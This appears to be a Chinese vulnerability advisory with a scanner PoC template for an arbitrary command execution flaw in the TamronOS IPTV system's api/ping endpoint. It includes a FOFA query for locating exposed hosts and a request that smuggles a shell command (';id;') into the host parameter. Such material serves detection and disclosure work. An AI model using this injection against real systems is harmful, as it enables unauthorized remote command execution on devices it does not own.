漏洞描述
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。TamronOS IPTV系统 api/ping 存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令。
fofa-query: app="TamronOS-IPTV系统"
tamron-os-iptv-ping-rce: TamronOS IPTV系统 ping 任意命令执行漏洞
PoC代码[已公开]
id: tamron-os-iptv-ping-rce
info:
name: TamronOS IPTV系统 ping 任意命令执行漏洞
author: daffainfo
severity: critical
verified: true
description: |
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。TamronOS IPTV系统 api/ping 存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令。
fofa-query: app="TamronOS-IPTV系统"
reference:
- https://mp.weixin.qq.com/s/-Nh_ptkpfQ7jxszQyzT9gQ
rules:
r0:
request:
method: GET
path: /api/ping?count=5&host=;id;
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()